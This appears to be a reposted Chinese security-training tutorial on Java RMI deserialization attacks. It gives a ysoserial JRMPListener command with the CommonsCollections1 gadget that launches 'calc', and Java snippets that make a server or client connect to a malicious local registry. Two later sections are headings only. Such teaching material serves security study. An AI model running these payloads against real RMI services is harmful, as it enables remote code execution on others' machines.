当前位置:网站首页 > 黑客培训 > 正文

java安全-02RMI

freebuffreebuf 2022-03-28 345 0

本文来源:

攻击方式

注册端攻击服务端

java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"     public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {        //开启一个恶意的reg,然后server去过去链接注册,则会中招        String url = "rmi://127.0.0.1:1099/setUser";        Naming.unbind(url);    }

注册端攻击客户端

    public static void main(String[] args) {        //PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"        try{            String url = "rmi://127.0.0.1:1099/exp";            User user = (User) Naming.lookup(url);         }catch(Exception e){            e.printStackTrace();        }    }

服务端攻击注册端

  1. 注册端开启

  1. Server端利用CC1进行攻击

服务端攻击客户端

  1. 服务端将恶意类注册

  1. 客户端加载执行

转载请注明来自网盾网络安全培训,本文标题:《java安全-02RMI》

标签:javajava安全

猜你喜欢

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表

战略合作伙伴

网盾科技

Powered by www.plaaso.com

咨询热线:18696195380,18672920250 (微信同号)   商务合作:13260607300 QQ:3329043 QQ群:594653844

鄂ICP备2023003462号-13 ©2020-2028 plaaso.com 网盾安全培训